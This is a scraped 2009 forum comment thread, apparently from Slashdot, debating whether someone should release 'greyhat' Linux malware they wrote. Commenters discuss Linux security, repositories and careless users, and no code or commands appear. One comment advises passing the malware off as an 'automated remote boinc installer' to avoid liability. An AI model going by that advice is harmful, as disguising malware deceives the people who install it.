	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30290010</id>
	<title>groundmaother</title>
	<author>Anonymous</author>
	<datestamp>1259666820000</datestamp>
	<modclass>Troll</modclass>
	<modscore>-1</modscore>
	<htmltext><p>My ground mother will appreciate you packet... can you make it a little more harmful?  Say... make it turning on my ground mother air conditioner when is to hot or to cold... that would make it a grate way to give it way to every one... even if it opens the doors of my Linux machine (or windows) to everyone else... but wait there's more! That already exists (malware) across Windows, Linux, Apple, Juice (lol), UNIX, etc. so what would you want to say that is new to everyone that is observing all the millions of problems being fixed in all platforms at all times?</p></htmltext>
<tokenext>My ground mother will appreciate you packet... can you make it a little more harmful ?
Say... make it turning on my ground mother air conditioner when is to hot or to cold... that would make it a grate way to give it way to every one... even if it opens the doors of my Linux machine ( or windows ) to everyone else... but wait there 's more !
That already exists ( malware ) across Windows , Linux , Apple , Juice ( lol ) , UNIX , etc .
so what would you want to say that is new to everyone that is observing all the millions of problems being fixed in all platforms at all times ?</tokentext>
<sentencetext>My ground mother will appreciate you packet... can you make it a little more harmful?
Say... make it turning on my ground mother air conditioner when is to hot or to cold... that would make it a grate way to give it way to every one... even if it opens the doors of my Linux machine (or windows) to everyone else... but wait there's more!
That already exists (malware) across Windows, Linux, Apple, Juice (lol), UNIX, etc.
so what would you want to say that is new to everyone that is observing all the millions of problems being fixed in all platforms at all times?</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30281200</id>
	<title>Re:Commendable</title>
	<author>Anonymous</author>
	<datestamp>1259666220000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>2) Linux commands on their own can look very cryptic to the uninitiated.. add into that the scripting abilities of most shells.. and a new Linux user won't be able to differentiate a malicious command from one that will get their ATI driver working again</p><p>Minor correction</p></htmltext>
<tokenext>2 ) Linux commands on their own can look very cryptic to the uninitiated.. add into that the scripting abilities of most shells.. and a new Linux user wo n't be able to differentiate a malicious command from one that will get their ATI driver working againMinor correction</tokentext>
<sentencetext>2) Linux commands on their own can look very cryptic to the uninitiated.. add into that the scripting abilities of most shells.. and a new Linux user won't be able to differentiate a malicious command from one that will get their ATI driver working againMinor correction</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278620</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30283686</id>
	<title>Re:Arrogance... Nothing New.</title>
	<author>mark-t</author>
	<datestamp>1259685120000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>I would have pointed out that their assertion depends entirely upon what one means by "hack".  If by hack, one means to utilize the facilities of the system to perform some surreptitious function without the administrator knowing about it until it's too late, then yeah... you can't hack it.  If, however, by hack, one means forcefully rendering the system less useful for those who want to use it as it was intended by the administrators, then it seems to me that a DOS most certainly would qualify.</htmltext>
<tokenext>I would have pointed out that their assertion depends entirely upon what one means by " hack " .
If by hack , one means to utilize the facilities of the system to perform some surreptitious function without the administrator knowing about it until it 's too late , then yeah... you ca n't hack it .
If , however , by hack , one means forcefully rendering the system less useful for those who want to use it as it was intended by the administrators , then it seems to me that a DOS most certainly would qualify .</tokentext>
<sentencetext>I would have pointed out that their assertion depends entirely upon what one means by "hack".
If by hack, one means to utilize the facilities of the system to perform some surreptitious function without the administrator knowing about it until it's too late, then yeah... you can't hack it.
If, however, by hack, one means forcefully rendering the system less useful for those who want to use it as it was intended by the administrators, then it seems to me that a DOS most certainly would qualify.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279164</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30288578</id>
	<title>Re:You've failed to understand the real world</title>
	<author>mcgrew</author>
	<datestamp>1259660820000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>You don't think I can screw your slide rule up if I get physical access? 4x4=18 anyone? Al you have to do is repaint the markers.</p></htmltext>
<tokenext>You do n't think I can screw your slide rule up if I get physical access ?
4x4 = 18 anyone ?
Al you have to do is repaint the markers .</tokentext>
<sentencetext>You don't think I can screw your slide rule up if I get physical access?
4x4=18 anyone?
Al you have to do is repaint the markers.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279060</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279710</id>
	<title>Re:Malware and Worms in GNU/Linux and *BSD</title>
	<author>some\_guy\_88</author>
	<datestamp>1259605920000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>Your human-assisted privlege escalation code will never make it into a default repo which is the only way people (expect those who know what they are doing) should be installing software. Because of that, it will never get executed by anyone.</p><p>The software repo is one of the most important security features that protects users from themeselves. It's easy to tell a new linux user "only install software via the repo" than it is to educate a windows user on how to identify dangerous software out there on the web.</p><p>If your code actually exploits a flaw in a running service or some such thing then obviously thats a different story.</p></htmltext>
<tokenext>Your human-assisted privlege escalation code will never make it into a default repo which is the only way people ( expect those who know what they are doing ) should be installing software .
Because of that , it will never get executed by anyone.The software repo is one of the most important security features that protects users from themeselves .
It 's easy to tell a new linux user " only install software via the repo " than it is to educate a windows user on how to identify dangerous software out there on the web.If your code actually exploits a flaw in a running service or some such thing then obviously thats a different story .</tokentext>
<sentencetext>Your human-assisted privlege escalation code will never make it into a default repo which is the only way people (expect those who know what they are doing) should be installing software.
Because of that, it will never get executed by anyone.The software repo is one of the most important security features that protects users from themeselves.
It's easy to tell a new linux user "only install software via the repo" than it is to educate a windows user on how to identify dangerous software out there on the web.If your code actually exploits a flaw in a running service or some such thing then obviously thats a different story.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278934</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30287808</id>
	<title>Re:I think you've already decided...</title>
	<author>psithurism</author>
	<datestamp>1259700960000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>The most chronic viruses for Windows and Mac have always been trojans and mal-ware. Usually self executing and sent over email. A few years ago back in college there was a huge infestation of that trojan that looked like spam and you had to decrypt it before you could run it. As a computer science major, people would ask me to help them infect their pcs with it until I explained to them that doing that was bad.<br> <br>I know several people who can barely use computers who got sold on the "Linux is the most awesome operating system ever!" before considering their own needs might differ from the people saying that. Sure its nice to (try to) explain to them that they don't need to block port 135 or patch for worms before plugging into the internet and personally I feel they are more secure, but I could easily see them downloading something like this item in the article in an email, and then running a bunch of shell commands from the email, before calling me to install the urgent Redhatpatch they just received from President Obama himself on their Ubuntu system.</htmltext>
<tokenext>The most chronic viruses for Windows and Mac have always been trojans and mal-ware .
Usually self executing and sent over email .
A few years ago back in college there was a huge infestation of that trojan that looked like spam and you had to decrypt it before you could run it .
As a computer science major , people would ask me to help them infect their pcs with it until I explained to them that doing that was bad .
I know several people who can barely use computers who got sold on the " Linux is the most awesome operating system ever !
" before considering their own needs might differ from the people saying that .
Sure its nice to ( try to ) explain to them that they do n't need to block port 135 or patch for worms before plugging into the internet and personally I feel they are more secure , but I could easily see them downloading something like this item in the article in an email , and then running a bunch of shell commands from the email , before calling me to install the urgent Redhatpatch they just received from President Obama himself on their Ubuntu system .</tokentext>
<sentencetext>The most chronic viruses for Windows and Mac have always been trojans and mal-ware.
Usually self executing and sent over email.
A few years ago back in college there was a huge infestation of that trojan that looked like spam and you had to decrypt it before you could run it.
As a computer science major, people would ask me to help them infect their pcs with it until I explained to them that doing that was bad.
I know several people who can barely use computers who got sold on the "Linux is the most awesome operating system ever!
" before considering their own needs might differ from the people saying that.
Sure its nice to (try to) explain to them that they don't need to block port 135 or patch for worms before plugging into the internet and personally I feel they are more secure, but I could easily see them downloading something like this item in the article in an email, and then running a bunch of shell commands from the email, before calling me to install the urgent Redhatpatch they just received from President Obama himself on their Ubuntu system.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278820</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279634</id>
	<title>err...what was your point again?</title>
	<author>dAzED1</author>
	<datestamp>1259605200000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>3</modscore>
	<htmltext><p>No malware?  I think the claim is that Linux doesn't have the threat from <b>viruses</b> that Windows does - actually, it has little threat from them at all.</p><p><i>loose security configurations and mindless execution of unverified downloads</i> - so, the sort of thing no admin with any brains, regardless the OS they were using, would do?  The difference is, you can fairly much lock up Linux very fast, with little a non-privileged person can do, while not really limiting what services the machine will offer.  With Windows on the other hand, it takes more effort to lock it down, and things become far more burdensome to deal with once you do.  Let me tell you how much I loved having errors all over the policy editor in windows because of some basic security settings...which meant that doing normal, everyday windows admin tasks you would be confronted with errors left and right because of the policy settings.  Doing normal, everyday UNIX admin tasks on a locked down box though...no issues.</p><p>Why do people take the argument so damn <b>personally</b>, anyway?  The OSes are meant for different things.  That one is better at some things than the other should make sense - they have entirely different methodologies.</p><p>PS - it took you a *week* to write something that could exploit "loose security configurations?"  Give me 5 minutes and I'll write something.  Go ahead and publish whatever you wrote, I'm sure several of us could use the laugh.</p></htmltext>
<tokenext>No malware ?
I think the claim is that Linux does n't have the threat from viruses that Windows does - actually , it has little threat from them at all.loose security configurations and mindless execution of unverified downloads - so , the sort of thing no admin with any brains , regardless the OS they were using , would do ?
The difference is , you can fairly much lock up Linux very fast , with little a non-privileged person can do , while not really limiting what services the machine will offer .
With Windows on the other hand , it takes more effort to lock it down , and things become far more burdensome to deal with once you do .
Let me tell you how much I loved having errors all over the policy editor in windows because of some basic security settings...which meant that doing normal , everyday windows admin tasks you would be confronted with errors left and right because of the policy settings .
Doing normal , everyday UNIX admin tasks on a locked down box though...no issues.Why do people take the argument so damn personally , anyway ?
The OSes are meant for different things .
That one is better at some things than the other should make sense - they have entirely different methodologies.PS - it took you a * week * to write something that could exploit " loose security configurations ?
" Give me 5 minutes and I 'll write something .
Go ahead and publish whatever you wrote , I 'm sure several of us could use the laugh .</tokentext>
<sentencetext>No malware?
I think the claim is that Linux doesn't have the threat from viruses that Windows does - actually, it has little threat from them at all.loose security configurations and mindless execution of unverified downloads - so, the sort of thing no admin with any brains, regardless the OS they were using, would do?
The difference is, you can fairly much lock up Linux very fast, with little a non-privileged person can do, while not really limiting what services the machine will offer.
With Windows on the other hand, it takes more effort to lock it down, and things become far more burdensome to deal with once you do.
Let me tell you how much I loved having errors all over the policy editor in windows because of some basic security settings...which meant that doing normal, everyday windows admin tasks you would be confronted with errors left and right because of the policy settings.
Doing normal, everyday UNIX admin tasks on a locked down box though...no issues.Why do people take the argument so damn personally, anyway?
The OSes are meant for different things.
That one is better at some things than the other should make sense - they have entirely different methodologies.PS - it took you a *week* to write something that could exploit "loose security configurations?
"  Give me 5 minutes and I'll write something.
Go ahead and publish whatever you wrote, I'm sure several of us could use the laugh.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279172</id>
	<title>It is all in the presentation...</title>
	<author>ldgeorge85</author>
	<datestamp>1259600940000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>If you are worried about the legal implications, why don't you just present and release it as something like 'automated remote boinc installer'. At that point, it is the decision of the end user whether to use it for it original purpose, or change it for their own purpose(be it legal or illegal). Make sure to release it under a good license that releases you of liability. Do not release it as 'Linux malware', or you probably will get pinned for it.</htmltext>
<tokenext>If you are worried about the legal implications , why do n't you just present and release it as something like 'automated remote boinc installer' .
At that point , it is the decision of the end user whether to use it for it original purpose , or change it for their own purpose ( be it legal or illegal ) .
Make sure to release it under a good license that releases you of liability .
Do not release it as 'Linux malware ' , or you probably will get pinned for it .</tokentext>
<sentencetext>If you are worried about the legal implications, why don't you just present and release it as something like 'automated remote boinc installer'.
At that point, it is the decision of the end user whether to use it for it original purpose, or change it for their own purpose(be it legal or illegal).
Make sure to release it under a good license that releases you of liability.
Do not release it as 'Linux malware', or you probably will get pinned for it.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30281210</id>
	<title>If you support linux, why you want to release it?</title>
	<author>DoMore</author>
	<datestamp>1259666400000</datestamp>
	<modclass>Interestin</modclass>
	<modscore>2</modscore>
	<htmltext>If you created this code in hopes of making things better, first of all, talk to developers, if you have good ideas about how to eliminate such possible threats, or write articles and talk to regular people about good computer practice and computer security thus educating them.
Those who do understand computer security, already know it is possible to hack any system and they do not need any kind of demonstration.
It has always been possible to hack a system, whether it is windows, mac or linux,<nobr> <wbr></nobr>...just wait for a bug and thats it you will have your chance of hacking.
And to release it, just to show some regular people that it is possible to hack stuff in linux too is useless, pointless and even harmful in longterm. Regular people do not understand, do not want to understand and will never understand computer security.
So if you wan't to make thing worse, go, release the code and start to screw up the linux system.</htmltext>
<tokenext>If you created this code in hopes of making things better , first of all , talk to developers , if you have good ideas about how to eliminate such possible threats , or write articles and talk to regular people about good computer practice and computer security thus educating them .
Those who do understand computer security , already know it is possible to hack any system and they do not need any kind of demonstration .
It has always been possible to hack a system , whether it is windows , mac or linux , ...just wait for a bug and thats it you will have your chance of hacking .
And to release it , just to show some regular people that it is possible to hack stuff in linux too is useless , pointless and even harmful in longterm .
Regular people do not understand , do not want to understand and will never understand computer security .
So if you wa n't to make thing worse , go , release the code and start to screw up the linux system .</tokentext>
<sentencetext>If you created this code in hopes of making things better, first of all, talk to developers, if you have good ideas about how to eliminate such possible threats, or write articles and talk to regular people about good computer practice and computer security thus educating them.
Those who do understand computer security, already know it is possible to hack any system and they do not need any kind of demonstration.
It has always been possible to hack a system, whether it is windows, mac or linux, ...just wait for a bug and thats it you will have your chance of hacking.
And to release it, just to show some regular people that it is possible to hack stuff in linux too is useless, pointless and even harmful in longterm.
Regular people do not understand, do not want to understand and will never understand computer security.
So if you wan't to make thing worse, go, release the code and start to screw up the linux system.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279964</id>
	<title>I usually get much Schadenfreude ...</title>
	<author>Anonymous</author>
	<datestamp>1259609100000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>from people trying to spell Schadenfreude.</p></htmltext>
<tokenext>from people trying to spell Schadenfreude .</tokentext>
<sentencetext>from people trying to spell Schadenfreude.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278820</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30289190</id>
	<title>Re:It does harm!!!!</title>
	<author>Man Eating Duck</author>
	<datestamp>1259663520000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><blockquote><div><p>A third person moved into the house, and there was no way at all to force him to leave because he had not broken the door himself</p></div></blockquote><p>I find this extremely hard to believe, especially because of its anecdotal nature. The French have no notion of private property? If I run through the door as you exit, you can't have me removed because I didn't break the door? If you hire/ask random criminals to do your dirty work, or benefit from others' criminal behaviour, you are not responsible? How did this third person prove it wasn't him who broke the door?</p><blockquote><div><p>All he could do was pay for renovation again, there was no way he could sue the person and have him pay the bills.</p></div></blockquote><p>And the French have no protection from vandalism? It's ok to break stuff, for instance furniture or doors, because you can't be prosecuted or sued?</p><blockquote><div><p>Gotta love a country [...] where you can just "steal" a house from someone and thrash it completely without any consequences...</p></div></blockquote><p>This doesn't ring true. I googled for a while and, as expected, found absolutely nothing to support your story. Do you have links to laws, or even news stories?</p></div>
	</htmltext>
<tokenext>A third person moved into the house , and there was no way at all to force him to leave because he had not broken the door himselfI find this extremely hard to believe , especially because of its anecdotal nature .
The French have no notion of private property ?
If I run through the door as you exit , you ca n't have me removed because I did n't break the door ?
If you hire/ask random criminals to do your dirty work , or benefit from others ' criminal behaviour , you are not responsible ?
How did this third person prove it was n't him who broke the door ? All he could do was pay for renovation again , there was no way he could sue the person and have him pay the bills.And the French have no protection from vandalism ?
It 's ok to break stuff , for instance furniture or doors , because you ca n't be prosecuted or sued ? Got ta love a country [ ... ] where you can just " steal " a house from someone and thrash it completely without any consequences...This does n't ring true .
I googled for a while and , as expected , found absolutely nothing to support your story .
Do you have links to laws , or even news stories ?</tokentext>
<sentencetext>A third person moved into the house, and there was no way at all to force him to leave because he had not broken the door himselfI find this extremely hard to believe, especially because of its anecdotal nature.
The French have no notion of private property?
If I run through the door as you exit, you can't have me removed because I didn't break the door?
If you hire/ask random criminals to do your dirty work, or benefit from others' criminal behaviour, you are not responsible?
How did this third person prove it wasn't him who broke the door?All he could do was pay for renovation again, there was no way he could sue the person and have him pay the bills.And the French have no protection from vandalism?
It's ok to break stuff, for instance furniture or doors, because you can't be prosecuted or sued?Gotta love a country [...] where you can just "steal" a house from someone and thrash it completely without any consequences...This doesn't ring true.
I googled for a while and, as expected, found absolutely nothing to support your story.
Do you have links to laws, or even news stories?
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280830</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278832</id>
	<title>get your nobel prize too</title>
	<author>Anonymous</author>
	<datestamp>1259597700000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>kind of like blaming the digital camera for sexting. technology is neutral, its people that are evil</p></htmltext>
<tokenext>kind of like blaming the digital camera for sexting .
technology is neutral , its people that are evil</tokentext>
<sentencetext>kind of like blaming the digital camera for sexting.
technology is neutral, its people that are evil</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279094</id>
	<title>Silly</title>
	<author>Demonantis</author>
	<datestamp>1259599920000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>Security through obscurity does not work. If you can write a program there is at least one much less ethical person out there willing to do it as well. The fact we don't see it suggests that people are not motivated or see a benefit in doing it. I suspect much won't happen if you release it. I realize it might also be the case that it is going unreported. Either way it will get developers motivated to fix the issues. See Microsoft for example. So that when Linux becomes a major OS and people will want to freak the systems they will have a much harder time.</htmltext>
<tokenext>Security through obscurity does not work .
If you can write a program there is at least one much less ethical person out there willing to do it as well .
The fact we do n't see it suggests that people are not motivated or see a benefit in doing it .
I suspect much wo n't happen if you release it .
I realize it might also be the case that it is going unreported .
Either way it will get developers motivated to fix the issues .
See Microsoft for example .
So that when Linux becomes a major OS and people will want to freak the systems they will have a much harder time .</tokentext>
<sentencetext>Security through obscurity does not work.
If you can write a program there is at least one much less ethical person out there willing to do it as well.
The fact we don't see it suggests that people are not motivated or see a benefit in doing it.
I suspect much won't happen if you release it.
I realize it might also be the case that it is going unreported.
Either way it will get developers motivated to fix the issues.
See Microsoft for example.
So that when Linux becomes a major OS and people will want to freak the systems they will have a much harder time.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280660</id>
	<title>Release it.  DO IT NAO!</title>
	<author>Dagmar d'Surreal</author>
	<datestamp>1259661300000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>What?  Have things now become so gentrified that this question even needs to be asked?<br>
<br>
Release it already.<br>
<br>
The 90's were great because there were active threats from all sides, spurring people to meet the challenge with actual defenses against the mayhem.  By comparison now things are much more secure, but they are also incredibly less exciting, and <i>markedly</i> less <i>progressive</i>.  If developers/coders are driven by a need to scratch an "itch" then by all means let's make things itchy again.<br>
<br>
The software is non-malicious you say?  <i>Great!</i>  If nothing else it'll serve as some things for people to think about as they continue to develop their environments, and at the very least it sounds like you may have identified some genuinely soft spots in the current generation of Linux distributions.  You would be <i>far</i> from the first person to post non-malicious proof-of-concept code to say, Bugtraq.  This is not new ground--no one is going to claim you did something wrong by publishing.<br>
<br>
<b> <i>Release it already!</i> </b> <br>
<br>
Either we're tough enough to handle it, or we'll <i>get</i> tough enough to handle it.</htmltext>
<tokenext>What ?
Have things now become so gentrified that this question even needs to be asked ?
Release it already .
The 90 's were great because there were active threats from all sides , spurring people to meet the challenge with actual defenses against the mayhem .
By comparison now things are much more secure , but they are also incredibly less exciting , and markedly less progressive .
If developers/coders are driven by a need to scratch an " itch " then by all means let 's make things itchy again .
The software is non-malicious you say ?
Great ! If nothing else it 'll serve as some things for people to think about as they continue to develop their environments , and at the very least it sounds like you may have identified some genuinely soft spots in the current generation of Linux distributions .
You would be far from the first person to post non-malicious proof-of-concept code to say , Bugtraq .
This is not new ground--no one is going to claim you did something wrong by publishing .
Release it already !
Either we 're tough enough to handle it , or we 'll get tough enough to handle it .</tokentext>
<sentencetext>What?
Have things now become so gentrified that this question even needs to be asked?
Release it already.
The 90's were great because there were active threats from all sides, spurring people to meet the challenge with actual defenses against the mayhem.
By comparison now things are much more secure, but they are also incredibly less exciting, and markedly less progressive.
If developers/coders are driven by a need to scratch an "itch" then by all means let's make things itchy again.
The software is non-malicious you say?
Great!  If nothing else it'll serve as some things for people to think about as they continue to develop their environments, and at the very least it sounds like you may have identified some genuinely soft spots in the current generation of Linux distributions.
You would be far from the first person to post non-malicious proof-of-concept code to say, Bugtraq.
This is not new ground--no one is going to claim you did something wrong by publishing.
Release it already!
Either we're tough enough to handle it, or we'll get tough enough to handle it.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279080</id>
	<title>Lamesauce</title>
	<author>Anonymous</author>
	<datestamp>1259599920000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>3</modscore>
	<htmltext><p>Sounds like you have too much time on your hands. Linux and Unix boxes get rooted and kitted all the time, from various security holes in PHP, SQLi, etc. Writing some "greyhat malware" package doesn't really demonstrate anything. It's a well known fact that *nix is still vulnerable to attack, and I really see no relevance to what you're doing. Besides, anyone who runs a locked down system and has any degree of paranoia wouldn't run SETI@Home, Distributed.net or any other similar distributed client software. OSSEC would pick this jazz up in half a second. Congratulations on some questionable bash scripting.</p></htmltext>
<tokenext>Sounds like you have too much time on your hands .
Linux and Unix boxes get rooted and kitted all the time , from various security holes in PHP , SQLi , etc .
Writing some " greyhat malware " package does n't really demonstrate anything .
It 's a well known fact that * nix is still vulnerable to attack , and I really see no relevance to what you 're doing .
Besides , anyone who runs a locked down system and has any degree of paranoia would n't run SETI @ Home , Distributed.net or any other similar distributed client software .
OSSEC would pick this jazz up in half a second .
Congratulations on some questionable bash scripting .</tokentext>
<sentencetext>Sounds like you have too much time on your hands.
Linux and Unix boxes get rooted and kitted all the time, from various security holes in PHP, SQLi, etc.
Writing some "greyhat malware" package doesn't really demonstrate anything.
It's a well known fact that *nix is still vulnerable to attack, and I really see no relevance to what you're doing.
Besides, anyone who runs a locked down system and has any degree of paranoia wouldn't run SETI@Home, Distributed.net or any other similar distributed client software.
OSSEC would pick this jazz up in half a second.
Congratulations on some questionable bash scripting.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30284292</id>
	<title>needs a payoff</title>
	<author>Anonymous</author>
	<datestamp>1259687700000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>Arrange for it to steal two cents from each person who installs it, then every month or so deposit half of what it's collected to Torvalds' bank account, and send the other half of the month's take to one lucky infected user.</p><p>People will be begging for the thing.</p><p>PS, who wrote the AI behind the Captcha system?  It's really good.  The word for this post is:</p><p>"Pyramid"</p></htmltext>
<tokenext>Arrange for it to steal two cents from each person who installs it , then every month or so deposit half of what it 's collected to Torvalds ' bank account , and send the other half of the month 's take to one lucky infected user.People will be begging for the thing.PS , who wrote the AI behind the Captcha system ?
It 's really good .
The word for this post is : " Pyramid "</tokentext>
<sentencetext>Arrange for it to steal two cents from each person who installs it, then every month or so deposit half of what it's collected to Torvalds' bank account, and send the other half of the month's take to one lucky infected user.People will be begging for the thing.PS, who wrote the AI behind the Captcha system?
It's really good.
The word for this post is:"Pyramid"</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30283244</id>
	<title>Re:Malware and Worms in GNU/Linux and *BSD</title>
	<author>Anonymous</author>
	<datestamp>1259683140000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>It does not work on my system what is on default settings by Mandriva.</p><p>On Mandriva they do not use sudo. But they have configured the system so that you can not add or remove any new packages or installed. That is behind the root password. The default user what you add after system install, is permitted only to update installed packages with their own passwords. The repository is avaialble to be edited only by root.</p><p>On Mandriva, the user learns very fast that when they use root password, they need to be very sure what they do. And usually it is only from MCC = Mandriva Contol Center. The normal typical usage only need user password when maintaining current system = updateing installed packages.</p><p>They learn that root password is not asked anywhere else than accessing to MCC. Updates get notified but you can not install any thirdparty script or package trough that. And when even thinking about AppArmor, you can not even execute the third party script what is not profiled first by the root.</p><p>Mandrivas system is much more secure against stupid user than Ubuntu. Still it is not actually any harder. Teach correct password separation for different functions while Ubuntu even teach to the user that one password for all things is good and secure way.</p><p>With Mandriva, I can easily left normal user front of the computer. They do not install any software without asking because they are very unsure about their knowledge when they get asked root password. But the system updating goes easily and I do not need to take care of that. Typical Mandriva user calls mayby two times a year to me. While Ubuntu users do not call ever and they manage to get their systems bretty fuck up because they trust the system takes care and they are safe.</p><p>Needles to say, if Canonical would not use sudo on Ubuntu but more secure root | user separation, everything would be more secure. It would be even enough to only allow sudoer to use it for updateing existing packages.</p></htmltext>
<tokenext>It does not work on my system what is on default settings by Mandriva.On Mandriva they do not use sudo .
But they have configured the system so that you can not add or remove any new packages or installed .
That is behind the root password .
The default user what you add after system install , is permitted only to update installed packages with their own passwords .
The repository is avaialble to be edited only by root.On Mandriva , the user learns very fast that when they use root password , they need to be very sure what they do .
And usually it is only from MCC = Mandriva Contol Center .
The normal typical usage only need user password when maintaining current system = updateing installed packages.They learn that root password is not asked anywhere else than accessing to MCC .
Updates get notified but you can not install any thirdparty script or package trough that .
And when even thinking about AppArmor , you can not even execute the third party script what is not profiled first by the root.Mandrivas system is much more secure against stupid user than Ubuntu .
Still it is not actually any harder .
Teach correct password separation for different functions while Ubuntu even teach to the user that one password for all things is good and secure way.With Mandriva , I can easily left normal user front of the computer .
They do not install any software without asking because they are very unsure about their knowledge when they get asked root password .
But the system updating goes easily and I do not need to take care of that .
Typical Mandriva user calls mayby two times a year to me .
While Ubuntu users do not call ever and they manage to get their systems bretty fuck up because they trust the system takes care and they are safe.Needles to say , if Canonical would not use sudo on Ubuntu but more secure root | user separation , everything would be more secure .
It would be even enough to only allow sudoer to use it for updateing existing packages .</tokentext>
<sentencetext>It does not work on my system what is on default settings by Mandriva.On Mandriva they do not use sudo.
But they have configured the system so that you can not add or remove any new packages or installed.
That is behind the root password.
The default user what you add after system install, is permitted only to update installed packages with their own passwords.
The repository is avaialble to be edited only by root.On Mandriva, the user learns very fast that when they use root password, they need to be very sure what they do.
And usually it is only from MCC = Mandriva Contol Center.
The normal typical usage only need user password when maintaining current system = updateing installed packages.They learn that root password is not asked anywhere else than accessing to MCC.
Updates get notified but you can not install any thirdparty script or package trough that.
And when even thinking about AppArmor, you can not even execute the third party script what is not profiled first by the root.Mandrivas system is much more secure against stupid user than Ubuntu.
Still it is not actually any harder.
Teach correct password separation for different functions while Ubuntu even teach to the user that one password for all things is good and secure way.With Mandriva, I can easily left normal user front of the computer.
They do not install any software without asking because they are very unsure about their knowledge when they get asked root password.
But the system updating goes easily and I do not need to take care of that.
Typical Mandriva user calls mayby two times a year to me.
While Ubuntu users do not call ever and they manage to get their systems bretty fuck up because they trust the system takes care and they are safe.Needles to say, if Canonical would not use sudo on Ubuntu but more secure root | user separation, everything would be more secure.
It would be even enough to only allow sudoer to use it for updateing existing packages.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278934</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30283778</id>
	<title>Who said Linux is impervious to malware?</title>
	<author>Mobius\_6</author>
	<datestamp>1259685480000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>I could knit-pick your grammar, but is this overall claim based in empirical research? Linux certainly has it's flaws and while it's not susceptible to WINDOWS malware, it certainly is to a variety of others. Perhaps take a look at <a href="http://insecure.org/" title="insecure.org" rel="nofollow">http://insecure.org/</a> [insecure.org] or <a href="http://www.packetstormsecurity.org/" title="packetstormsecurity.org" rel="nofollow">http://www.packetstormsecurity.org/</a> [packetstormsecurity.org]. Both of these sites maintain lists of exploits to various version of Linux and many other types of GNU software as well. Rootkits most generally fall into the realm of 'malware' and once you've got root, baby, you've got the world.</p></htmltext>
<tokenext>I could knit-pick your grammar , but is this overall claim based in empirical research ?
Linux certainly has it 's flaws and while it 's not susceptible to WINDOWS malware , it certainly is to a variety of others .
Perhaps take a look at http : //insecure.org/ [ insecure.org ] or http : //www.packetstormsecurity.org/ [ packetstormsecurity.org ] .
Both of these sites maintain lists of exploits to various version of Linux and many other types of GNU software as well .
Rootkits most generally fall into the realm of 'malware ' and once you 've got root , baby , you 've got the world .</tokentext>
<sentencetext>I could knit-pick your grammar, but is this overall claim based in empirical research?
Linux certainly has it's flaws and while it's not susceptible to WINDOWS malware, it certainly is to a variety of others.
